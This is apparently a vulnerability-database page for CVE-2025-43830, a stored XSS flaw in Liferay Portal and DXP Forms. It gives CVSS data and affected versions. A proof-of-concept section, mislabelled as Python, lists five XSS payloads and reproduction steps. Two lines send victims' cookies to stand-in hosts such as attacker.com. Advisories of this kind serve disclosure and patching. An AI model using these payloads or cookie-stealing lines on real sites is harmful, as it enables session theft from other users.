Security Vulnerability Report
中文
CVE-2025-43830 CVSS 6.1 MEDIUM

CVE-2025-43830

Published: 2025-10-08 14:15:44
Last Modified: 2025-12-12 20:44:46
Source: [email protected]

Description

Stored cross-site scripting (XSS) vulnerability in Forms in Liferay Portal 7.3.2 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, and 7.3 GA through update 35 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a form with a rich text type field.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_2:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.3.2 - 7.4.3.111
Liferay DXP 2023.Q4.0 - 2023.Q4.5
Liferay DXP 2023.Q3.1 - 2023.Q3.8
Liferay DXP 7.4 GA - update 92
Liferay DXP 7.3 GA - update 35

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-43830: Liferay Portal Forms Stored XSS PoC --> <!-- This PoC demonstrates the stored XSS vulnerability in Liferay Forms rich text fields --> <!-- Payload 1: Using img tag with onerror event handler --> <img src=x onerror="alert('XSS-CVE-2025-43830');document.location='http://attacker.com/steal?cookie='+document.cookie"> <!-- Payload 2: Using script tag directly --> <script>alert('Stored XSS in Liferay Forms');</script> <!-- Payload 3: Using svg tag with onload event --> <svg onload="alert(document.domain)"> <!-- Payload 4: Using iframe to load malicious content --> <iframe src="javascript:alert('XSS')"></iframe> <!-- Payload 5: Using anchor tag with javascript pseudo-protocol --> <a href="javascript:void(0)" onclick="alert('XSS')">Click me</a> <!-- Steps to reproduce: 1. Navigate to a Liferay Portal page containing a Form with a Rich Text field 2. Inject one of the above payloads into the Rich Text field 3. Submit the form 4. When another user (especially admin) views the form data or page, the script executes --> // JavaScript payload for cookie stealing (for educational purposes only) var img = new Image(); img.src = "http://attacker-server.com/collect?cookie=" + encodeURIComponent(document.cookie) + "&url=" + encodeURIComponent(document.location.href);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43830", "sourceIdentifier": "[email protected]", "published": "2025-10-08T14:15:43.507", "lastModified": "2025-12-12T20:44:46.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored cross-site scripting (XSS) vulnerability in Forms in Liferay Portal 7.3.2 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, and 7.3 GA through update 35 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a form with a rich text type field."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:-:*:*:*:*:*:*", "matchCriteriaId": "6F6A98ED-E694-4F39-95D0-C152BD1EC115"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_1:*:*:*:*:*:*", "matchCriteriaId": "2CD6861A-D546-462F-8B22-FA76A4AF8A9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_2:*:*:*:*:*:*", "matchCriteriaId": "324BB977-5AAC-4367-98FC-605FF4997B3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_1:*:*:*:*:*:*", "matchCriteriaId": "2BBA40AC-4619-434B-90CF-4D29A1CA6D86"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_2:*:*:*:*:*:*", "matchCriteriaId": "135BED68-C2EC-4EE7-9138-91E0EE3608EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_3:*:*:*:*:*:*", "matchCriteriaId": "728DF154-F19F-454C-87CA-1E755107F2A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update1:*:*:*:*:*:*", "matchCriteriaId": "35F42314-AC3F-45B6-8BF8-49811E5F2FAB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update10:*:*:*:*:*:*", "matchCriteriaId": "AA984F92-4C6C-4049-A731-96F587B51E75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update11:*:*:*:*:*:*", "matchCriteriaId": "CADDF499-DDC4-4CEE-B512-404EA2024FCB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update12:*:*:*:*:*:*", "matchCriteriaId": "9EC64246-1039-4009-B9BD-7828FA0FA1C5"}, { ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.